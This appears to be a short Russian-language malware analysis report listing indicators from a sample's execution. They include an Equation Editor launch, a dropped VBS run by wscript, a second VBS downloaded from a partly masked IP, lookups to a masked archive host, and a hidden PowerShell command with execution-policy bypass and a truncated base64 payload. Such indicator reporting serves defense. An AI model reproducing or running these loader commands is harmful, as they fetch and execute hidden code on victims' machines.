Техническая информация
- '%WINDIR%\syswow64\wscript.exe' "%APPDATA%\wegivenbetterthingswithbestpeoplesgivenmebe.vbs"
- %APPDATA%\wegivenbetterthingswithbestpeoplesgivenmebe.vbs
- '40.##.185.194':80
- 'ar##ive.org':443
- http://40.##.185.194/185/wegivenbetterthingswithbestpeoplesgivenmebest.vbs
- 'ar##ive.org':443
- DNS ASK ar##ive.org
- '%CommonProgramFiles%\microsoft shared\equation\eqnedt32.exe' -Embedding
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -w hidden -noprofile -ep bypass -c "$availments='JGludGVyY29udmVydHMgPSAnVmtGSic7JGNhdGFseXRpY2FsbHkgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRpbnRlcmNvbnZlcnRzKTskcHJld2FyID0gW1N5c3Rl... (со скрытым окном)